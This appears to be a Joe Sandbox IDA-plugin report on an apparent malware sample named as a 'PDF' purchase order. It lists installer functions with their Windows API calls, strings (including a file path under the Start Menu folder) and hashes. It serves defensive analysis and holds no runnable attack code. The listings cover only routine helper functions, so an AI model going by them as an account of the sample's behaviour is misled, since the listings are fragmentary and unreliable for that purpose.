Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
API String ID: 1453599865-3010710425
Opcode ID: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
Opcode Fuzzy Hash: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E

Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402D33
GetTickCount.KERNEL32 ref: 00402D51
wsprintfW.USER32 ref: 00402D7F

Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
ShowWindow.USER32(00000000,00000005), ref: 00402DB1

Part of subcall function 00402CFC: MulDiv.KERNEL32(00026599,00000064,000290AA), ref: 00402D11

Strings

... %d%%, xrefs: 00402D79

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
Opcode Fuzzy Hash: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E

Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
GetMessagePos.USER32 ref: 00404A7F
ScreenToClient.USER32(?,?), ref: 00404A99
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1

Strings

f, xrefs: 00404AAD

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5

Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
wsprintfW.USER32 ref: 00402CCF
SetWindowTextW.USER32(?,?), ref: 00402CDF
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1

Strings

verifying installer: %d%%, xrefs: 00402CC4
unpacking data: %d%%, xrefs: 00402CBD, 00402CCD

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
Opcode Fuzzy Hash: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
Opcode Fuzzy Hash: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E

Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
wsprintfW.USER32 ref: 00404A10
SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23

Strings

%u.%u%s%s, xrefs: 004049F1

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
Opcode Fuzzy Hash: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19

Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDF
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E00
RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E23

Strings

: Completed, xrefs: 00405DB8

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: : Completed
API String ID: 3677997916-2954849223
Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9

Function 00405933 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405939
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405943
lstrcatW.KERNEL32(?,00409014), ref: 00405955

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405933

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68

Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405135
CallWindowProcW.USER32(?,?,?,?), ref: 00405186

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Strings

, xrefs: 00405116

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A

Function 0040381D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,004037F4,75923420,0040361F,?), ref: 00403837
GlobalFree.KERNEL32(?), ref: 0040383E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED

Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

